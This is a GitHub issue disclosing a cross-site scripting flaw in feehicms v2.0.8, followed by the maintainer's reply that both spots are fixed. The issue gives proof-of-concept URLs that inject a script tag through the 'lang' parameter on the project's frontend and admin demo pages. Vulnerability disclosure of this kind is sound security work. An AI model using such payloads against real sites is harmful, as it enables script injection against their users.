Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS vulnerability in feehicms v2.0.8 #45

Closed
Tazkimi opened this issue Nov 8, 2019 · 1 comment
Closed

XSS vulnerability in feehicms v2.0.8 #45

Tazkimi opened this issue Nov 8, 2019 · 1 comment

Comments

@Tazkimi
Copy link

Tazkimi commented Nov 8, 2019

This is a Cross Site Scripting vulnerability appear two place(frontend and backend). When the lang is english"><script>alert(/xss/)</script>< or other js code, the pop-up alert will be triggered when browsing the feehi post. Details are as follows:

POC example:
http://demo.cms.feehi.com/index.php?r=site/language&lang=english"><script>alert(/xss/)</script><
or

http://demo.cms.feehi.com/admin/index.php?r=site/language&lang=english"><script>alert(/xss/)</script>

xss1

View any post and xss pop-up:

image

image

jscode:
image

@liufee
Copy link
Owner

liufee commented Dec 23, 2019

thanks for your advice, these two places have fix

@liufee liufee closed this as completed Dec 23, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants